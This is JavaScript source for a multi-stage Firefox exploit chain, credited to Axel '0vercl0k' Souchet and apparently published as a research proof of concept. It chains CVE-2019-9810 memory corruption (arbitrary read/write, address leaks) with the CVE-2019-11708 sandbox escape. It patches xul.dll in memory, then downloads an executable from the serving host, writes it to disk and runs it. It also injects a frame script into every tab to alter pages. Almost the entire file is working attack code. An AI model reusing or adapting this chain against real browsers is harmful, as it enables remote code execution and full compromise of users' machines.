// Axel '0vercl0k' Souchet - November 19 2019 // 0:000> ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000`051c0f13 const XulsAutomationPrefIsSet = 0x051c0f13n; // 0:000> ? xul!disabledForTest - xul // Evaluate expression: 85400792 = 00000000`05171cd8 const XuldisabledForTest = 0x05171cd8n; const Debug = false; const dbg = p => { if(Debug == false) { return; } print(`Debug: ${p}`); }; const ArraySize = 0x5; const WantedArraySize = 0x42424242; let arr = null; let Trigger = false; const Spray = []; function f(Special, Idx, Value) { arr[Idx] = 0x41414141; Special.slice(); arr[Idx] = Value; } class SoSpecial extends Array { static get [Symbol.species]() { return function() { if(!Trigger) { return; } arr.length = 0; for(let i = 0; i < 0x40000; i++) { Spray.push(new Uint32Array(ArraySize)); } }; } }; function GetMeBiggie() { for(let Idx = 0; Idx < 0x100000; Idx++) { Spray.push(new Uint32Array(ArraySize)); } const SpecialSnowFlake = new SoSpecial(); for(let Idx = 0; Idx < 10; Idx++) { arr = new Array(0x7e); Trigger = false; for(let Idx = 0; Idx < 0x400; Idx++) { f(SpecialSnowFlake, 0x70, Idx); } Trigger = true; f(SpecialSnowFlake, 47, WantedArraySize); if(arr.length != 0) { continue; } const Biggie = Spray.find(e => e.length != ArraySize); if(Biggie != null) { return Biggie; } } return null; } function ExploitCVE_2019_9810() { print = console.log; const Biggie = GetMeBiggie(); if(Biggie == null || Biggie.length != WantedArraySize) { dbg('Failed to set things up :(.'); return false; } // // Scan for one of the Uint32Array we sprayed earlier. // let Biggie2AdjacentSize = null; const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize); for(let Idx = 0; Idx < 0x100; Idx++) { const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]); if(Qword == JSValueArraySize) { Biggie2AdjacentSize = Idx + 1; break; } } if(Biggie2AdjacentSize == null) { dbg('Failed to find an adjacent array :(.'); return false; } // // Use the array length as a marker. // const AdjacentArraySize = 0xbbccdd; Biggie[Biggie2AdjacentSize] = AdjacentArraySize; // // Find the array now.. // const AdjacentArray = Spray.find( e => e.length == AdjacentArraySize ); if(AdjacentArray == null) { dbg('Failed to find the corrupted adjacent array :(.'); return false; } const ReadPtr = Addr => { const SizeInDwords = 2; const SavedSlot = [ Biggie[Biggie2AdjacentSize], Biggie[Biggie2AdjacentSize + 2 + 2], Biggie[Biggie2AdjacentSize + 2 + 2 + 1] ]; // // Corrupt the `AdjacentArray`'s size / data slot. // Biggie[Biggie2AdjacentSize] = SizeInDwords; Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn); Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n); // // Read arbitrary location now. // const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]); // // Restore the `AdjacentArray`'s size / data slot. // Biggie[Biggie2AdjacentSize] = SavedSlot[0]; Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1]; Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2]; return Ptr; }; const WritePtr = (Addr, Value) => { const SizeInDwords = 2; const SavedSlot = [ Biggie[Biggie2AdjacentSize], Biggie[Biggie2AdjacentSize + 2 + 2], Biggie[Biggie2AdjacentSize + 2 + 2 + 1] ]; // // Corrupt the `AdjacentArray`'s size / data slot. // Biggie[Biggie2AdjacentSize] = SizeInDwords; Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn); Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n); // // Write to arbitrary location now. // AdjacentArray[0] = Number(Value & 0xffffffffn); AdjacentArray[1] = Number(Value >> 32n); // // Restore the `AdjacentArray`'s size / data slot. // Biggie[Biggie2AdjacentSize] = SavedSlot[0]; Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1]; Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2]; return true; }; const AddrOf = Obj => { AdjacentArray.hell_on_earth = Obj; // 0:000> dqs 1ae5716e76a0 // 00001ae5`716e76a0 00001ae5`7167dfd0 // 00001ae5`716e76a8 000010c5`8e73c6a0 // 00001ae5`716e76b0 00000238`9334e790 // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10 // 00001ae5`716e76c0 fffa0000`00000000 // 00001ae5`716e76c8 fff88000`00bbccdd // 0:000> !telescope 0x00002389334e790 // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown) const SlotOffset = Biggie2AdjacentSize - (3 * 2); const SlotsAddress = BigInt.fromUint32s( Biggie.slice(SlotOffset, SlotOffset + 2) ); return BigInt.fromJSValue(ReadPtr(SlotsAddress)); }; // // Let's move the battle field to the TenuredHeap // const ArrayBufferLength = 10; const AB1 = new ArrayBuffer(ArrayBufferLength); const AB2 = new ArrayBuffer(ArrayBufferLength); const AB1Address = AddrOf(AB1); const AB2Address = AddrOf(AB2); dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`); dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`); WritePtr(AB1Address + 0x28n, 0xfff8800000010000n); WritePtr(AB2Address + 0x28n, 0xfff8800000010000n); if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) { dbg('Corrupting the ArrayBuffers failed :(.'); return false; } const Primitives = BuildPrimitives(AB1, AB2); Math.atan2(AB2); // // All right, time to clean up behind ourselves. // Let's fix AdjacentArray's size first (as we are using Biggie to do it). // Biggie[Biggie2AdjacentSize] = ArraySize; // // Let's fix Biggie's length as we are done with it. // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580 // Detected xul.dll, using it as js module. // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337 // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348 // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0 // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...}) // @$smdump_jsvalue(0xfffe11e6fa2f7580) // // 0:000> !telescope 0x11e6fa2f7580 // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array)) // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array)) // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown) // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown) // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown) // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown) // const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n; Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize)); // // From there, we're kinda done - let's get god mode and fuck off. // GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest); return true; } // // This function uses a `Sandbox` with a `System Principal` to be able to grab the // `docShell` object off the `window` object. Once it has it, it can grab the frame // `messageManager` that we need to trigger the sandbox escape. // function GetContentFrameMessageManager(Win) { function _GetDocShellFromWindow(Win) { return Win.docShell; } const { Services } = Components.utils.import('resource://gre/modules/Services.jsm'); const Cu = Components.utils; const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal()); const Code = _GetDocShellFromWindow.toSource(); Cu.evalInSandbox(Code, Sbx); const DocShell = Sbx._GetDocShellFromWindow(Win); Cu.nukeSandbox(Sbx); return DocShell.messageManager; } // // This function sends a 'Prompt:Open' message over the frame message manager IPC, // with an URI. // function PromptOpen(Uri) { const FrameMM = GetContentFrameMessageManager(window); const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri }); return Result; } // // This is the function that abuses the `Prompt:Open` message to re-exploit the parent // process and escape the sandbox. // function TriggerCVE_2019_11708() { PromptOpen(`${location.origin}?stage3`); } // // This is the function that gets written into the frame script the exploit drops // on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a // `Browser Content toolbox` and execute the following in the `Browser Toolbox`: // Services.mm.loadFrameScript('file://frame-script.js', true) // This should break in the `Browser Content Toolbox` debugger window. // function FrameScriptPayload() { function PimpMyDocument() { // // Don't infect doar-e and leave Cthulhu alone... // if(content.document.location.origin == 'https://doar-e.github.io' || content.document.location.origin == 'http://localhost:8000') { return; } // // .. as well as don't play with non http origins (I've seen empty/null origins). // if(!content.document.location.origin.startsWith('http')) { return; } // // Time to party! Let's find every `A` tag and make them point to doar-e. // We also use this opportunity to make every `backgroundImage` / `backgroundColor` // style attributes to `none` / `transparent` to not hide the doar-e background. // for(const Node of content.document.getElementsByTagName('*')) { if(Node.tagName == 'A') { Node.href = 'https://doar-e.github.io/'; continue; } Node.style.backgroundImage = 'none'; Node.style.backgroundColor = 'transparent'; } // // Change the background. // content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)'; } // // First we set an event handler to make sure to be invoked when a new `content` // is created. Keep in mind that we basically have ~three cases to handle: // 1/ We are getting injected in an already existing tab, // 2/ We are getting injected in a new tab, // 3/ A user clicks on a link and a new `content` gets created. // We basically want to have control over those three events. The below ensures // we get a chance to execute code for 2/. // addEventListener('DOMWindowCreated', FrameScriptPayload); dump(`Hello from: ${content.location.origin}\n`); if(content.document != null && content.document.body != null) { // // Either the tab already existed in which case we already have a document which we // can play with... // PimpMyDocument(); return; } // // ..Or it doesn't exist quite yet and we want to get a callback when it does. // content.addEventListener('load', PimpMyDocument); } // // This function drops a file (open + write + close) using the OSFile JS module. // function DropFile(Path, Content) { // // We expect either a string or a TypedArray. // const Encoder = new TextEncoder(); const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content; return OS.File.open(Path, {write: true, truncate: true}) .then(File => { return Promise.all([ // We return the File object in order to be able to use it in the // next `.then`. This allows us to chain the `write` and the `close` // without another level of deepness. File, File.write(ContentBuffer), ]); }) .then((Results) => { const [File, _WrittenBytes] = Results; return File.close(); }); } // // This function drops / executes a payload binary, as well as inject a frame script // into every tabs. // function Payload() { // // Import a bunch of JS modules we will be using later. // const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm'); const { Services } = Components.utils.import('resource://gre/modules/Services.jsm'); // // First order of business, we create a first promise that downloads the payload // (aka Slime Shady), drops it in the profile directory and finally executes it. // const Dir = OS.Constants.Path.localProfileDir; const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe'); const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`) .then((Response) => { // // We return the result as a TypedArray as this is what `DropFile` // expects for binary content. // return Response.arrayBuffer(); }) .then((Content) => { // // Time to drop the file now. Note that we return the promise so // the next `then` executes when the file has been successfully dropped. // dbg(`Payload downloaded.`); return DropFile(PayloadPath, new Uint8Array(Content)); }) .then(() => { // // At this point, we are ready to spawn the payload, let's do it! // dbg(`Creating the process.. ${PayloadPath}`); CreateProcessA(PayloadPath); }) .catch(Ex => { console.log(`Exception in payload promise: ${Ex}`); }); // // Second order of business is to backdoor the tabs. To do so, we drop a frame // script that we inject into every tabs. // const FramePayloadContent = `${FrameScriptPayload.toSource()} FrameScriptPayload();`; const ScriptPath = OS.Path.join(Dir, 'frame-script.js'); const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent) .then(() => { // // At this time we are ready to inject the frame script into the tabs. // Note that we need to drop the file locally / use the file:// scheme // so that the tabs accept to interpret the file (unfortunately, // remote ones are ignored). // dbg(`About to loadFrameScript: ${ScriptPath}`); Services.mm.loadFrameScript(`file://${ScriptPath}`, true); }) .catch(Ex => { console.log(`Exception in frame payload promise: ${Ex}`); }); // // Last but not least, we set up code to execute on completion of both the above // promises. You have to remember that at this point the modal window is still open // and blocks navigation / UI interaction, so we need to close it as soon as we can // to be as stealth as possible. // Just for kicks, we spawn a calculator when we're done because why not. // Promise.all([PayloadPromise, FramePayloadPromise]) .then(() => { // // .. just for kicks. // CreateProcessA('c:\\windows\\system32\\calc.exe'); // // Phew, we made it here let's close the window :). // window.close(); }) .catch(Ex => { console.log(`Exception in clean up promise: ${Ex}`); window.close(); }); } // // This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled() // in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have // god mode. It's far from being the cleanest way, but this is the easiest way I found. // // nsresult nsSocketTransport::InitiateSocket() { // SOCKET_LOG(("nsSocketTransport::InitiateSocket [this=%p]\n", this)); // nsresult rv; // bool isLocal; // IsLocal(&isLocal); // if (gIOService->IsNetTearingDown()) { // return NS_ERROR_ABORT; // } // if (gIOService->IsOffline()) { // if (!isLocal) return NS_ERROR_OFFLINE; // } else if (!isLocal) { // if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() && // !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) { // nsAutoCString ipaddr; // RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr); // netaddr->GetAddress(ipaddr); // fprintf_stderr( // stderr, // "FATAL ERROR: Non-local network connections are disabled and a " // "connection " // "attempt to %s (%s) was made.\nYou should only access hostnames " // "available via the test networking proxy (if running mochitests) " // "or from a test-specific httpd.js server (if running xpcshell " // "tests). " // "Browser services should be disabled or redirected to a local " // "server.\n", // mHost.get(), ipaddr.get()); // MOZ_CRASH("Attempting to connect to non-local address!"); // } // } // function PatchInitiateSocket() { // // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket // so that it doesn't assert on us because we turned on testing features. // This is the assert we hit without the patch: // // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made. // You should only access hostnames available via the test networking proxy // (if running mochitests) or from a test-specific httpd.js server (if running // xpcshell tests). Browser services should be disabled or redirected to a local // server. // (4014.82c): Break instruction exception - code 80000003 (first chance) // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92: // 00007ff9`69a66372 cc int 3 // // Here is the disasembly before: // // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\mozilla-central\netwerk\base\nsSocketTransport2.cpp @ 1264]: // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)] // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1) // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)] // // And after: // // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\mozilla-central\netwerk\base\nsSocketTransport2.cpp @ 1264]: // 00007ff9`3f9c55c6 90 nop // 00007ff9`3f9c55c7 90 nop // 00007ff9`3f9c55c8 90 nop // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1) // // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul // Evaluate expression: 1529286 = 00000000`001755c6 // const PatchOffset = 0x001755c6n; const XulBase = BigInt(GetModuleHandleA('xul.dll').toString()); const PatchAddress = XulBase + PatchOffset; const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9]; PatchCode(PatchAddress, PatchContent); } function Main(Route) { // // One way to tell if we were successful with our data corruption is by checking // if we have access to the PrivilegeManager. If we do, it means we are running // with a privileged context, if not we don't. // const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined; if(Route == '?stage1') { // // If we are asked to run stage1 with access to a privileged context, we skip // it and move on to stage2. // if(RunningFromPrivilegedJS) { return Main('?stage2'); } // // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access // a privileged JS context. // if(!ExploitCVE_2019_9810()) { console.log('Failed :('); return; } // // Once we are done with the data corruption, we refresh the page to get access // to the privileged JS context. Moving on to stage2 \o/. // location.replace(`${location.origin}/?stage2`); } if(Route == '?stage2') { // // At this point we expect to have access to a privileged JS context. // If we don't it's probably bad news, so we'll just bail. // if(!RunningFromPrivilegedJS) { alert('problem'); return; } // // Turn on privileges so that we can access the `Components` object. // window.netscape.security.PrivilegeManager.enablePrivilege('doar-e'); // // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket // to avoid the Firefox being unhappy. // PatchInitiateSocket() // // Now that we have access to the privileged context, we are also able to talk // over the frame message manager IPC and trigger CVE-2019-11708 to escape the // exploit the parent process. // TriggerCVE_2019_11708(); } if(Route == '?stage3') { // // We should now be running in the broker which means we can exploit CVE-2019-9810 // to perform the same attack than in stage1 but this time in the parent process. // if(!ExploitCVE_2019_9810()) { console.log('Elevation failed, closing the window.'); window.close(); } // // If we are successful it means that by refreshing the page, we should have // access to the privileged JS context from the parent process. // This basically means full compromise and we move on to backdooring the tabs, // as well as dropping the payload. // location.replace(`${location.origin}/?final`); } if(Route == '?final') { // // All right, we start of by turning on privileges so that we can access `Components` // & cie. // window.netscape.security.PrivilegeManager.enablePrivilege('doar-e'); // // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket // to avoid the Firefox being unhappy. // PatchInitiateSocket() // // We've worked hard to get here and it's time to drop the goodies :). // Payload(); } } function Onload() { if(location.search != '') { Main(location.search); } }